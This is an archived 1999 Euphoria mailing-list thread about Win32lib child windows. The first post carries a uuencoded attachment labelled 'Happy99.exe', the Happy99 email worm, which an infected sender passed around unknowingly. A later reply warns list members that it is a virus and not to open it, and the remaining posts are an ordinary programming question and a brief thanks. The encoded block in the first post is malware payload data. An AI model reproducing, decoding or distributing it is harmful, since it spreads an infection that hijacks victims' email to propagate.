1. Win32lib & children
- Posted by David Robertson <drob at GISCO.NET>
Aug 29, 1999
-
Last edited Aug 30, 1999
begin 644 Happy99.exe
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````0`:`$`````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````0T]$10``````$``````!```*````!@``````````````````
M````$``````$```"````)```````````````````0```4```````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M____]____________O____[____]____O_____[___W___[__________/_U
M````````````````````````````````````````````````````````````
M`````````````````````````````````````T``````````````````````
M``````````````<`````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````#X``,`9``#``````````````````4!`P"P``,`````
M````````````$@$#`,```P`````````````````=`0,`\``#````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````````````````!`&@!```6
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
*````````````````
`
end
2. Win32lib & children
- Posted by David Robertson <drob at GISCO.NET>
Aug 29, 1999
-
Last edited Aug 30, 1999
I have made a gui calendar routine that displays the calendar,
highlights the current day, lets the user select month and year. And
when the user clicks on a day, sends the dtg back. Here is the
problem..
I call the function for my calendar, but it turns control over to my
main program before I really want it to. Is there a way to keep
control in the second window (which is not a direct child of the main
window)?
I have had this problem in the past but I just put all the create code
in my main file, along with the event models, but I want a self
contained function that will stay in control until it is ready to
return a value.
Thanks for your time.
Ranger Rob
RANGER'S LEAD THE WAY
3. Re: Win32lib & children
- Posted by Greg Harris <blackdog at CDC.NET>
Aug 29, 1999
-
Last edited Aug 30, 1999
Sorry to tell you this Mr. Robertson, but you have the Happy99 Virus.
Do not open the attachment that was sent called 'Happy99.exe'.
It will infect your computer and transmit this virus to others via your
email.
Greg Harris
----- Original Message -----
From: David Robertson <drob at GISCO.NET>
To: <EUPHORIA at LISTSERV.MUOHIO.EDU>
Sent: Sunday, August 29, 1999 6:22 PM
Subject: Win32lib & children
I have made a gui calendar routine that displays the calendar,
highlights the current day, lets the user select month and year. And
when the user clicks on a day, sends the dtg back. Here is the
problem..
I call the function for my calendar, but it turns control over to my
main program before I really want it to. Is there a way to keep
control in the second window (which is not a direct child of the main
window)?
I have had this problem in the past but I just put all the create code
in my main file, along with the event models, but I want a self
contained function that will stay in control until it is ready to
return a value.
Thanks for your time.
Ranger Rob
RANGER'S LEAD THE WAY
4. Re: Win32lib & children
Thank you for that
-----Original Message-----
From: David Robertson <drob at GISCO.NET>
To: EUPHORIA at LISTSERV.MUOHIO.EDU <EUPHORIA at LISTSERV.MUOHIO.EDU>
Date: 30 August 1999 04:33
Subject: Win32lib & children